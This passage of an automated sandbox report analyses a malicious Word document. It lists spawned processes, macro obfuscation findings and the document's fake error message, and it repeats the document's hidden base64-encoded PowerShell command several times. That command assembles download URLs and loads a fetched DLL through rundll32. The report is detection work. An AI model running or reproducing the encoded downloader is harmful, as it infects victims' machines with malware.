nACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source:	Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source:	Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp

Source: Informacion_29.doc

Initial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: Informacion_29.doc	Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7

Document contains an embedded VBA with many randomly named variables

Show sources

Source: Informacion_29.doc

Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAn